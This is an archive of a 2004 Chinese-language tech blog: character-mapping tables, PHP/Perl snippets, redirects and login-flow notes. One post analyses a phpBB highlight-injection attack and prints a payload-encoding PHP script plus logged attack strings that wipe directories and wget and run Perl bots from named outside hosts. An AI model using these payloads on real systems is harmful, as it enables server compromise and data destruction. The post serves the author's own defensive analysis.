梉 樁 -> 樁 eg. 木樁 (臺灣) 木樁 (大陸)
淩 凌 -> 凌 eg. 凌晨 (臺灣) 凌晨 (大陸)
涷 凍 -> 凍 eg. 冷凍 (臺灣) 冷凍 (大陸)
淛 浙 -> 浙 eg. 浙江 (臺灣) 浙江 (大陸)
痌 恫 -> 恫 eg. 恫嚇 (臺灣) 恫嚇 (大陸)
莕 荇 -> 荇 eg. 荇菜 (臺灣) 荇菜 (大陸)
衒 炫 -> 炫 eg. 炫耀 (臺灣) 炫耀 (大陸)
酖 鴆 -> 鴆 eg. 鴆酒 (臺灣) 鴆酒 (大陸)
傌 罵 -> 罵 eg. 咒罵 (臺灣) 咒罵 (大陸)
媮 偷 -> 偷 eg. 小偷 (臺灣) 小偷 (大陸)
寔 實 -> 實 eg. 實在 (臺灣) 實在 (大陸)
寑 寢 -> 寢 eg. 就寢 (臺灣) 就寢 (大陸)
掱 扒 -> 扒 eg. 扒手 (臺灣) 扒手 (大陸)
揜 掩 -> 掩 eg. 掩蓋 (臺灣) 掩蓋 (大陸)
揌 塞 -> 塞 eg. 堵塞 (臺灣) 堵塞 (大陸)
棑 排 -> 排 eg. 排隊 (臺灣) 排隊 (大陸)
殽 淆 -> 淆 eg. 混淆 (臺灣) 混淆 (大陸)
絏 紲 -> 紲 eg. 纍紲 (臺灣) 纍紲 (大陸)
羢 絨 -> 絨 eg. 絨毛 (臺灣) 絨毛 (大陸)
羡 羨 -> 羡 eg. 羨慕 (臺灣) 羨慕 (大陸)
菉 綠 -> 綠 eg. 翠綠 (臺灣) 翠綠 (大陸)
菑 災 -> 災 eg. 災害 (臺灣) 災害 (大陸)
僊 仙 -> 仙 eg. 仙子 (臺灣) 仙子 (大陸)
寘 置 -> 置 eg. 設置 (臺灣) 設置 (大陸)
尟 鮮 -> 鮮 eg. 尟少 (臺灣) 鮮少 (大陸)
揫 揪 -> 揪 eg. 揪打 (臺灣) 揪打 (大陸)
搉 榷 -> 榷 eg. 商榷 (臺灣) 商榷 (大陸)
搨 拓 -> 拓 eg. 拓殖 (臺灣) 拓殖 (大陸)
椷 緘 -> 緘 eg. 緘默 (臺灣) 緘默 (大陸)
煠 炸 -> 炸 eg. 油炸 (臺灣) 油炸 (大陸)
睠 眷 -> 眷 eg. 眷顧 (臺灣) 眷顧 (大陸)
筦 管 -> 管 eg. 管事 (臺灣) 管事 (大陸)
筩 筒 -> 筒 eg. 竹筒 (臺灣) 竹筒 (大陸)
萲 萱 -> 萱 eg. 萱萱 (臺灣) 萱萱 (大陸)
裌 夾 -> 夾 eg. 夾層 (臺灣) 夾層 (大陸)
遉 偵 -> 偵 eg. 偵察 (臺灣) 偵察 (大陸)
塼 磚 -> 磚 eg. 磚頭 (臺灣) 磚頭 (大陸)
廕 蔭 -> 蔭 eg. 福蔭 (臺灣) 福蔭 (大陸)
朢 望 -> 望 eg. 願望 (臺灣) 愿望 (大陸)
劄 札 -> 札 eg. 札記 (臺灣) 札記 (大陸)
膆 嗉 -> 嗉 eg. 嗉囊 (臺灣) 嗉囊 (大陸)
銕 鐵 -> 鐵 eg. 鐵 (臺灣) 鐵 (大陸)
儌 徼 -> 徼 eg. 徼幸 (臺灣) 徼幸 (大陸)
翫 玩 -> 玩 eg. 玩耍 (臺灣) 玩耍 (大陸)
蔕 蒂 -> 蒂 eg. 結蒂 (臺灣) 結蒂 (大陸)
蝯 猿 -> 猿 eg. 猿猴 (臺灣) 猿猴 (大陸)
褎 袖 -> 袖 eg. 袖子 (臺灣) 袖子 (大陸)
儗 擬 -> 擬 eg. 擬人 (臺灣) 擬人 (大陸)
寯 俊 -> 俊 eg. 英俊 (臺灣) 英俊 (大陸)
橤 蕊 -> 蕊 eg. 花蕊 (臺灣) 花蕊 (大陸)
濇 澀 -> 澀 eg. 生澀 (臺灣) 生澀 (大陸)
穈 糜 -> 糜 eg. 糜爛 (臺灣) 糜爛 (大陸)
蔾 藜 -> 藜 eg. 蒺藜 (臺灣) 蒺藜 (大陸)
賮 贐 -> 贐 eg. 餽贐 (臺灣) 饋贐 (大陸)
踼 踢 -> 踢 eg. 踢踏 (臺灣) 踢踏 (大陸)
縳 縛 -> 縛 eg. 縛緊 (臺灣) 縛緊 (大陸)
薧 槁 -> 槁 eg. 槁木 (臺灣) 槁木 (大陸)
鍼 針 -> 針 eg. 針炙 (臺灣) 針炙 (大陸)
骾 鯁 -> 鯁 eg. 魚鯁 (臺灣) 魚鯁 (大陸)
繐 穗 -> 穗 eg. 稻穗 (臺灣) 稻穗 (大陸)
繖 傘 -> 傘 eg. 雨傘 (臺灣) 雨傘 (大陸)
蹧 糟 -> 糟 eg. 糟糕 (臺灣) 糟糕 (大陸)
蹚 趟 -> 趟 eg. 一趟 (臺灣) 一趟 (大陸)
雝 雍 -> 雍 eg. 雍正 (臺灣) 雍正 (大陸)
穨 頹 -> 頹 eg. 頹喪 (臺灣) 頹喪 (大陸)
襢 袒 -> 袒 eg. 袒身 (臺灣) 袒身 (大陸)
騣 鬃 -> 鬃 eg. 馬鬃 (臺灣) 馬鬃 (大陸)
鐉 銑 -> 銑 eg. 銑床 (臺灣) 銑床 (大陸)
纍 累 -> 累 eg. 疲累 (臺灣) 疲累 (大陸)
臝 裸 -> 裸 eg. 裸體 (臺灣) 裸體 (大陸)
飀 遛 -> 遛 eg. 遛鳥 (臺灣) 遛鳥 (大陸)
鶱 騫 -> 騫 eg. 騫 (臺灣) 騫 (大陸)
灕 漓 -> 漓 eg. 淋漓 (臺灣) 淋漓 (大陸)
龢 和 -> 和 eg. 和平 (臺灣) 和平 (大陸)
矙 瞰 -> 瞰 eg. 俯瞰 (臺灣) 俯瞰 (大陸)
灨 贛 -> 贛 eg. 贛江 (臺灣) 贛江 (大陸)
钃 鐲 -> 鐲 eg. 手鐲 (臺灣) 手鐲 (大陸)

■13.二對一繁轉簡:繁罕字→簡罕字

1)一繁體罕用字與一繁體罕用字,在簡體系統對應到同一簡體
罕用字。

繁體 簡体 繁體辭彙 簡体詞匯
====================================================================
扐 仂 -> 仂 eg. 扐 仂語 (臺灣) 仂 仂語
虮 蟣 -> 虮 eg. 虮 蟣 (臺灣) 虮 虮
笻 筇 -> 筇 eg. 笻 筇 (臺灣) 笻 筇
搌 榐 -> 榐 eg. 搌 榐 (臺灣) 搌 榐
簆 筘 -> 筘 eg. 簆 筘 (臺灣) 筘 筘
禰 檷 -> 檷 eg. 禰衡 檷 (臺灣) 檷衡 檷
鐽 鉭 -> 鉭 eg. 鐽 鉭 (臺灣) 鉭 鉭
潠 噀 -> 噀 eg. 潠 噀 (臺灣) 噀 噀
鴳 鷃 -> 鷃 eg. 鴳 鷃 (臺灣) 鷃 鷃
箷 椸 -> 椸 eg. 箷 椸 (臺灣) 椸 椸
簻 檛 -> 檛 eg. 簻 檛 (臺灣) 檛 檛
蠙 玭 -> 玭 eg. 蠙 玭 (臺灣) 玭 玭
葅 菹 -> 菹 eg. 葅 菹 (臺灣) 菹 菹
筰 笮 -> 笮 eg. 筰 笮 (臺灣) 笮 笮


■5.二對一繁轉簡 -- 形音義相關

形:字首或字根部分相同。
音:相同
義:在繁體文章中,兩者不可混用。


繁體 簡体 繁體辭彙 簡体詞匯
====================================================================
遊 游 -> 游 eg. 旅遊 游泳 (臺灣) 旅游 游泳 (大陸)
註 注 -> 注 eg. 註解 注入 (臺灣) 注解 注入 (大陸)
後 后 -> 后 eg. 後者 皇后 (臺灣) 后者 皇后 (大陸)
彙 匯 -> 匯 eg. 彙整 匯出 (臺灣) 匯整 匯出 (大陸)
註 注 -> 注 eg. 註解 注入 (臺灣) 注解 注入 (大陸)
穫 獲 -> 獲 eg. 收穫 獲得 (臺灣) 收獲 獲得 (大陸)
醱 撥 -> 撥 eg. 醱酵 撥出 (臺灣) 撥酵 撥出 (大陸)
願 愿 -> 愿 eg. 願意 鄉愿 (臺灣) 撥意 鄉愿 (大陸)
癥 症 -> 症 eg. 癥兆 症狀 (臺灣) 症兆 症狀 (大陸)
摃 扛 -> 扛 eg. 抬摃 扛下 (臺灣) 抬扛 扛下 (大陸)
卹 恤 -> 恤 eg. 撫卹 體恤 (臺灣) 撫恤 體恤 (大陸)
蒨 茜 -> 茜 eg. 蒨 茜 (人名) 蒨 茜 (人名)
牠 它 -> 它 eg. 牠 它 (代名詞) 牠 它 (代名詞)
祂 他 -> 他 eg. 祂 他 (代名詞) 祂 他 (代名詞)
妳 你 -> 你 eg. 妳 你 (代名詞) 妳 你 (代名詞)
彿 佛 -> 佛 eg. 彷彿 佛教 (臺灣) 彷佛 佛教 (大陸)
姪 侄 -> 侄 eg. 姪女 侄子 (臺灣) 侄女 侄子 (大陸)
悽 淒 -> 淒 eg. 悲悽 淒涼 (臺灣) 悲淒 淒涼 (大陸)
姦 奸 -> 奸 eg. 強姦 奸細 (臺灣) 強奸 奸細 (大陸)
託 托 -> 托 eg. 拜託 托兒 (臺灣) 拜托 托兒 (大陸)
珮 佩 -> 佩 eg. 玉珮 佩服 (臺灣) 玉佩 佩服 (大陸)
梱 捆 -> 捆 eg. 梱 捆紮 (臺灣) 捆 捆紮 (大陸)
桿 杆 -> 杆 eg. 橫桿 欄杆 (臺灣) 橫杆 欄杆 (大陸)
釦 扣 -> 扣 eg. 鈕釦 扣除 (臺灣) 鈕扣 扣除 (大陸)
剷 鏟 -> 鏟 eg. 剷除 鏟子 (臺灣) 鏟除 鏟子 (大陸)
綵 彩 -> 彩 eg. 剪綵 彩色 (臺灣) 剪彩 彩色 (大陸)
輓 挽 -> 挽 eg. 輓聯 挽救 (臺灣) 挽聯 挽救 (大陸)
犛 犁 -> 犁 eg. 犛牛 犁田 (臺灣) 犁牛 犁田 (大陸)
盪 蕩 -> 蕩 eg. 震盪 放蕩 (臺灣) 震蕩 放蕩 (大陸)
銼 剉 -> 銼 eg. 銼刀 剝皮剉骨 剉刀 剝皮剉骨

衝 沖 -> 沖 eg. 衝突 沖積 (臺灣) 沖突 沖積 (大陸)
醃 腌 -> 腌 eg. 醃漬 腌臢 (臺灣) 腌漬 腌臢 (大陸)
瀋 沈 -> 沈 eg. 瀋陽 沈(姓(臺灣) 沈陽 沈(姓(大陸)
嶽 岳 -> 岳 eg. 山嶽 岳父 (臺灣) 山岳 岳父 (大陸)
薑 姜 -> 姜 eg. 生薑 姜 (姓氏) 生薑 姜 (姓氏)
髒 臟 -> 臟 eg. 骯髒 內臟 (臺灣) 骯臟 內臟 (大陸)

蹠 跖 -> 跖 eg. 蹠骨 盜跖 (臺灣) 跖骨 盜跖
觔 筋 -> 筋 eg. 觔斗 筋肉 筋斗 筋肉
瘖 喑 -> 喑 eg. 瘖啞 喑惡叱吒 喑啞 喑惡叱吒
梜 筴 -> 筴 eg.
篛 箬 -> 箬 eg. 篛竹 箬竹
胄 冑 -> 冑 eg. 裔胄 甲冑
糢 饃 -> 饃 eg. 糢糊 饃饃
罈 壇 -> 壇 eg. 酒罈 杏壇
廱 癰 -> 癰 eg. 廱 養癰貽患
伋 汲 -> 汲 eg. 伋 汲水
鎯 榔 -> 榔 eg. 鎯頭 檳榔
旛 幡 -> 幡 eg. 旗旛 幡然

懍 檁 -> 檁 eg. 懍然 脊檁
箄 箅 -> 箅 eg. 甑箄 箅子
縯 演 -> 演 eg. 縯 演員


臺灣食物用詞

碗粿 碗棵
焢肉 控肉
土魠魚 土托魚
飯糰 飯團
=========================

Posted by jon at 11:35 AM | Comments (0) | TrackBack

December 29, 2004

好用的 Script 提供站

Heiner's SHELLdorado
這邊寫的 code.. 應該比自己寫的還好~ XD

Posted by jon at 06:41 PM | Comments (0) | TrackBack

December 28, 2004

crack 解析

最近光這個 Error URL 就不知道看過多少..
看了這個後還是要警惕自己.. 系統安全還是要小小維護一下...
最主要 要注意的是 MT 的 archives 不能給 cgi-bin 執行的權限..
這樣子就可以安心了~~ :)

原來這是 phpBB 的漏洞
升級後問題回報

產生轉換程式
<?php
while ( list($key,$val)=each($_POST)) {
echo "$key=$val
";
$$key=$val;
}
echo "<html><body><form method=POST action=./url.php><input type=text name=cmd value=\"\"><input type=submit name=smt1 value=\"轉換\"></form></body></html>\n";
if (isset($smt1)) {
echo "你輸入的 Cmd:$cmd<BR>\n";
$cmd_code=phpbb_code($cmd);
echo "&highlight=".$cmd_code."<BR>";
}
透過上面,你將 "cat ./config.php" 轉出來會為:
&highlight=%2527%252esystem(chr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(46)%252echr(47)%252echr(99)%252echr(111)%252echr(110)%252echr(102)%252echr(105)%252echr(103)%252echr(46)%252echr(112)%252echr(104)%252echr(112))%252e%2527


function phpbb_code($cmd)
{
$str="%2527%252esystem(";
$chars = preg_split('//', $cmd, -1, PREG_SPLIT_NO_EMPTY);
$cnt=count($chars)-1;
for($i=0;$i<=$cnt;$i++) {
if ($i==$cnt)
$str=$str."chr(".ord($chars[$i])."))%252e";
else
$str=$str."chr(".ord($chars[$i]).")%252e";
}
$str=$str."%2527";
return $str;
}
?>

error.log 記錄的東西.. wget 抓的每個 session file 都是一隻 perl prgoram.
要存成 session file 並放在 tmp 主要是要讓你搞混用的..

/blog/archives/2004_04.html&rush=echo _START_;
cd /tmp;
rm -rf *;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;
perl sess_189f0f0889555397a4de5485dd611111;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;
perl sess_189f0f0889555397a4de5485dd611113;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;
perl sess_189f0f0889555397a4de5485dd611112;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;
perl sess_189f0f0889555397a4de5485dd611114;
rm -rf *;
cd /var/tmp/;
rm -rf *;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;
perl sess_189f0f0889555397a4de5485dd611111;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;
perl sess_189f0f0889555397a4de5485dd611113;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;
perl sess_189f0f0889555397a4de5485dd611112;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;
perl sess_189f0f0889555397a4de5485dd611114;
rm -rf *;
cd /var/spool/mail/;
rm -rf *;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;
perl sess_189f0f0889555397a4de5485dd611111;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;
perl sess_189f0f0889555397a4de5485dd611113;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;
perl sess_189f0f0889555397a4de5485dd611112;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;
perl sess_189f0f0889555397a4de5485dd611114;
rm -rf *;
cd/var/mail/;
rm -rf *;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;
perl sess_189f0f0889555397a4de5485dd611111;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;
perl sess_189f0f0889555397a4de5485dd611113;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;
perl sess_189f0f0889555397a4de5485dd611112;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;
perl sess_189f0f0889555397a4de5485dd611114;
rm -rf *;
cd /usr/local/apache/proxy/;
rm -rf *;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;
perl sess_189f0f0889555397a4de5485dd611111;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;
perl sess_189f0f0889555397a4de5485dd611113;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;
perl sess_189f0f0889555397a4de5485dd611112;
wget envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;
perl sess_189f0f0889555397a4de5485dd611114;
rm -rf *;
echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27


又一個新的方式. 不過寫法比較簡潔.
/blog/archives/2004_04.html&rush=echo _START_;
killall -9 perl;
cd /tmp;
mkdir .temp22;
cd .temp22;
wget http://www.abcft.org/themes/bot.htm;
wget http://http://weblicious.com/.notes/ssh2.htm;
perl ssh2.htm;
rm ssh.htm;
perl bot.htm;
rm bot.htm;
echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';


這個比較聰明的寫法. 不過還是很爛
GET /~jon/blog/archives/cat_ae.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;
%20rm%20-rf%20*;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;
perl%20sess_189f0f0889555397a4de5485dd611111;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;
perl%20sess_189f0f0889555397a4de5485dd611116;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;
perl%20sess_189f0f0889555397a4de5485dd611115;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;
perl%20sess_189f0f0889555397a4de5485dd611117;
rm%20-rf%20*;
cd%20/var/tmp/;rm%20-rf%20*;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;
perl%20sess_189f0f0889555397a4de5485dd611111;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;
perl%20sess_189f0f0889555397a4de5485dd611116;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;
perl%20sess_189f0f0889555397a4de5485dd611115;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;
perl%20sess_189f0f0889555397a4de5485dd611117;
rm%20-rf%20*;
cd%20/var/spool/mail/;
rm%20-rf%20*;wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;
perl%20sess_189f0f0889555397a4de5485dd611111;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;
perl%20sess_189f0f0889555397a4de5485dd611116;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;
perl%20sess_189f0f0889555397a4de5485dd611115;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;
perl%20sess_189f0f0889555397a4de5485dd611117;
rm%20-rf%20*;
cd%20/var/mail/;rm%20-rf%20*;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;
perl%20sess_189f0f0889555397a4de5485dd611111;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;
perl%20sess_189f0f0889555397a4de5485dd611116;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;
perl%20sess_189f0f0889555397a4de5485dd611115;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;
perl%20sess_189f0f0889555397a4de5485dd611117;
rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;
rm%20-rf%20*;wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;
perl%20sess_189f0f0889555397a4de5485dd611111;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;
perl%20sess_189f0f0889555397a4de5485dd611116;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611115;
perl%20sess_189f0f0889555397a4de5485dd611115;
wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611117;
perl%20sess_189f0f0889555397a4de5485dd611117;
rm%20-rf%20*;
killall%20-9%20wget%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%2
9.%2527

再來
archives/cat_ae.html&highlight=%27%2esystem(chr(105)%2echr(100)%2echr(59))%2e%27

Posted by jon at 03:53 PM | Comments (0) | TrackBack

December 27, 2004

PHP抓昨天日期

本文最新網址位於 PHP 日期轉換
PHP 抓昨天日期的程式碼
date("d/m/y", time()-24*3600);

其它一些日期 code 的應用.

Mysql日期和時間函數不求人
所有 Mysql 日期函數 應該全都用到了吧.. XD

PHP 入門必讀 - 日期及時間

<?php
echo date("Y/m/d H:i:s")."\n";
$timestamp = mktime(date(H), date(i), date(s), date(m), date(d), date(Y));
echo $timestamp."\n";
echo date("Y/m/d H:i:s", $timestamp)."\n";
echo strftime("%Y/%m/%d %H:%M:%S", $timestamp)."\n";

// timestamp 轉換 等應用.
$a = date("Y-m-d H:i:s");
echo $a;
echo "\n";
echo strtotime($a);
echo "\n";
echo time();
echo "\n";
echo date("Y/m/d H:i:s", strtotime($a))."\n";
echo date("Y/m/d H:i:s", time())."\n";
?>

==========================================
perl 日期運用(date 轉 unixtime)
#!/usr/bin/perl
use Class::Date qw(date);
$unixtime = date("2002-03-03 10:06:54")->epoch;
print $unixtime ."\n";
$unixtime = date("2002-03-03 10:06:54");
print $unixtime ."\n";

(若沒有 Class:Date, 要裝 libclass-date-perl)

Posted by jon at 12:00 PM | Comments (0) | TrackBack

防止砍站行為Shell Script

OSSACC - 自由軟體應用諮詢中心
防止砍站行為的 Shell Script

以下轉載自 : 防止砍站行為的 Shell Script

請停止以「同一時間多重連線」的方式下載檔案,您會被禁止連上網站!!

由於砍站軟體常一次發出太多的連線數,使得敝站的硬體資源無法承受,常會導致有瀏覽頁面的需求朋友無法連上網站。因此我們使用了防止砍站的 Shell Script 來阻擋砍站軟體連線數過多的狀況。

這支 Shell Script 是由 Netman@study-area.org 所撰寫的,可以由這裡來取得: block.http.sh

當這支 shell script 一發現有砍站的情況時,會立即將來源 IP 設定為禁止取存網站的資源,最少十分鐘之後才會解除限制。當解除之後如果發現同一 IP 又有砍站的情況時,就會連續禁止二個禮拜之後才會再解除。

如果您習慣了使用砍站軟體來下載程式,您還是可以繼續使用,只要將連線數限制在 1 個,就不會被防止砍站的 Shell Script 視為砍站的行為。以敝站的網路頻寬來講,單一連線並不會降低您下載的速率,多重連線才會使您被防止砍站的 ShellScript 阻擋在外而無法下載。

Posted by jon at 09:57 AM | Comments (0) | TrackBack

November 29, 2004

Doxygen 程式文件產生

Doxygen 是一個程式的文件產生工具. 可將程式中的特定註解轉換成為說明文件.
以下有簡單的教學
Doxygen簡介
Doxygen 的使用教學
Doxygen 的使用方法,本篇以 解析 plog ( .php 檔)為範例做一步一步的解說

Posted by jon at 04:18 PM | Comments (0) | TrackBack

秀 Table 分隔線語法

javascript:O=document.getElementsByTagName('TABLE');
for(I=0;I<O.length;I++) O[I].style.border=
'3px dotted #00FF00';alert('OK,'+O.length);

把以上三行整合為一行.. 然後貼入 IE 或 Firefox 的網址列執行.
就可以秀出整個頁面是怎麼被切的(table)..

Posted by jon at 03:15 PM | Comments (0) | TrackBack

October 22, 2004

PHP 加密編碼

http://tw.php.net/manual/en/function.convert-uuencode.php
http://tw.php.net/manual/en/function.convert-uudecode.php

可惜我現在還沒有機器跑 PHP5.. 真想用用看 :)

Posted by jon at 10:30 AM | Comments (1) | TrackBack

October 04, 2004

各種語言的 Regular Expressions

討論各種程式語言的 Regular Expressions Redular Expressions Info

Ex:
將 varRegular 中的 > 的前後加上空白... 如下.
regular = varRegular.replace(/>/g," > ");

JavaScript Regular Expressions

Pattern Matching and Regular Expressions
JavaScript Regular Expressions

Posted by jon at 02:31 PM | Comments (0) | TrackBack

October 01, 2004

Debugging Kernel Problems

Debugging Kernel Problems

真是厲害~~ 非常棒的 文件~~~
有空一定要好好研究研究~~ :)

Posted by jon at 08:54 AM | Comments (0) | TrackBack

July 15, 2004

Perl 文字取代

感謝 洪朝貴 老師 寫的 Regular Expression.

老師的教導, 而學生當時沒有好好學習.. 需要用到時才偷偷的溜回去看老師的網頁..
真是慚愧... 慚愧之餘.... 還是趕快把語法記下來.. :p

取代法1: perl -pe 's/<?/<?php/g' 檔名
取代法2: perl -pe 's/<\?/<\?php/g' action.php > action-new.php
取代法3: perl -i -pe 's/<\?/<\?php/g' `find . -iname '*htm*'`
取代法3 後面的 find.. 可以改用其它你想改的檔名(ex: 改成 *.php)
以上三個範例都是要將 <? 改成 <?php 的做法..
只是 取代法3 能將所有目錄中.你想取代的檔案都取代到
(靠自己多嘗試學習吧!!)

Posted by jon at 08:59 AM | Comments (0) | TrackBack

July 08, 2004

寫得很暴力的抓圖器

此篇文章實在太棒了...
但我又不知道該加到 技術文件 還是 笑話區...
看標題寫的好像很技術的樣子.. 就加入技術文件好了..

轉載自 寫得很暴力的抓圖器

這篇使用方法寫的太有趣了.. 整篇留下來... :p

寫得很暴力的抓圖器 by aladdin

說到抓圖,很多色情網站會檢查http header的referer,如果referer不清楚或不在這個網域,就會將網頁導向到別的地方(也就抓回錯誤的資訊)。這使得一般抓圖的工具都變得很困難。

由於大部分色情網站都會留下一個縮圖的頁面讓人點選,所以,我寫了一個小東西,專門另開視窗開啟頁面上所有連到.jpg檔案的連結。

以下請自行合倂成為一行:
javascript: a=window.document.links; for(i=0; i<a.length;i++){ if(a[i].href.toLowerCase().indexOf(".jpg")>0){a[i].target="_blank"; a[i].click();}}

這段小程式的使用方法是,叫出你所要抓的網頁,把上面直接貼到網址列,按下return,就會連開一堆視窗。然後一個一個save,或是到browser的 cache裡去把暫存檔抓出來就可以了。如果有人想知道哪些網頁只能用這個方式抓圖,可以私下跟我討論......(必須年滿十八歲)。

這段程式碼,是我尋找了很久以後得到的結果。仔細思考這段程式碼的人,應該可以從中看到許多安全性上的問題(看出來了嗎?javascript: window.document.forms[0].submit(),你的javascript data checker這下子怎麼辦?)

請記得,我對IE的DOM的瞭解,全來自解決色情網站的挑戰。

轉載自 寫得很暴力的抓圖器

Posted by jon at 10:07 AM | Comments (0) | TrackBack

June 29, 2004

自動轉址寫法

網頁自動轉址.. 每次想到都要去找..
不如直接貼過來算了 .. ^^;

a,b 轉載自 : Openwebmail FAQ

a.
----------------------------------------
<html><head>
<meta http-equiv="Refresh"
content="0;URL=http://your_server/cgi-bin/openwebmail/openwebmail.pl">
</head></html>
----------------------------------------
b.
---------------------------------------
<html>
<body onload=
"window.open('http://your_server/cgi-bin/openwebmail/openwebmail.pl','_top')">
</body>
</html>
----------------------------------------

以下是其它寫法 (非Html)
----------------------------------------
c. PHP header 寫法
---------------------------------------
header("Location: https://fgps.tcc.edu.tw/cgi-bin/openwebmail/openwebmail.pl");
---------------------------------------
d. JavaScript 寫法
---------------------------------------
<script language="Javascript">
<!--
if (screen.width == "800")
{
location="fgps/800/index.php?link=index"
}
else
{
location="fgps/1024/index.php?link=index"
}
//-->
</script>
---------------------------------------

Posted by jon at 02:45 PM | Comments (0) | TrackBack

June 24, 2004

Linux 使用 PHP 連MS SQL

這是我之前一直嘗試不出來的,雖然知到要用 Freetds ,但是總是有些問題,
沒想到有人寫出教學文件了,看看以下的連結吧 !!

連結 : 在Linux下可以用PHP連線 MS SQL2000嗎

Posted by jon at 08:48 AM | Comments (0) | TrackBack

June 21, 2004

htmlArea(線上編輯器) For Mozilla & IE

Javascript 寫的線上編輯器(Html),以下這邊可以免費下載來使用,
而且感覺功能比 Frontpage 還強。

編輯器下載位址: htmlArea - Turn any textarea into a WYSIWYG editor

pLog 的 Source Code 看來的 -- pLog Download
(應該是目前唯一一套可以在 Mozilla 線上編輯 Html 碼的 BLog)

Posted by jon at 06:03 PM | Comments (0) | TrackBack

April 09, 2004

PHP使用者-登入/登出流程

Cookie + Session + Database 來達成使用者登入、登出、未登出直接關閉瀏覽器時該注意的問題,以下流程就可以歸避了。非常重要的一篇文章~

取自BBS中 PHP版的文章. 做一點小修改.(完整文章於深入閱讀)

登入、登出、關閉瀏覽器 流程 :

使用者登入 ->
1. 用 uniquid 產生唯一的session 值 .
2. 將該 session 連同登入時間 存入 database .
3. 將該 session 值 存入使用者 cookie .
PS:
   關於 1. 跟直接用 session_id() 一樣, 就是剛進來就給他一個 session.
   (session 會自動產生一個 uniquid 的值, 來當 session 的名稱, 使用 session_id() 即可取用)

使用者已登入 ->
1. 每頁核對 cookie 的 session 與 datebase 的值, 且檢查時間是否已經超過 .
2. 若已經過期 ,則刪除該筆資料.

使用者登出 ->
刪除資料庫中的 session 值 . 同時刪除使用者 cookie .

使用者關閉瀏覽器 ->
由於產生的 uniquid 直不會重複,所以重開瀏覽器後需要重新登入.

session timeout問題

titan:
> 當使用cookie作為session handle時, 要如何同時
> 強制client(瀏覽器)關閉時 自動清除cookie,
> 而client(瀏覽器)尚未關閉時, cookie有自己的timeout時限
> 用php如何同時達成兩者

duan:
http://tw.php.net/setcookie

1. lifetime with the browser
expire: If not set, the cookie will expire at the end of the session
(when the browser closes).

2. check by time
set create time when cookie set, and check the timeout when browser
access server

供您參考. :)

titan:
但我希望的是兩這同時有效...
也就是當有設timeout的時候, cookie的確會timeout to expire
但是當cookie尚未達到timeout時間前關閉瀏覽器, browser不會自動清除cookie
而希望達成的目的是, 不管有沒有設timeout, 只要關閉瀏覽器,
就要刪除該cookie, 或者使該cookie失效(expire)
思索中...

duan:
唔....不好意思, 早上回覆的比較簡略, 弟的意思是說這兩個方法並用. :)
也就是說, 不要設 expire time, 於是 cookie's lifetime 就和 browser
一樣. 然後設 cookie 時, 同時記錄設 cookie 的時間, 在 browser access
網頁時, 檢查 cookie 是否超過想要限制的時間, 若超過則移除該 cookie.
以上未經實作, 理論上可行, 供您參考. :)

darkhero:
這樣的流程如何呢? :

使用者登入 -> 用 uniquid 產生一 session 值 .
將該 session 連同登入時間 存入 database .
將該 session 值 存入使用者 cookie .

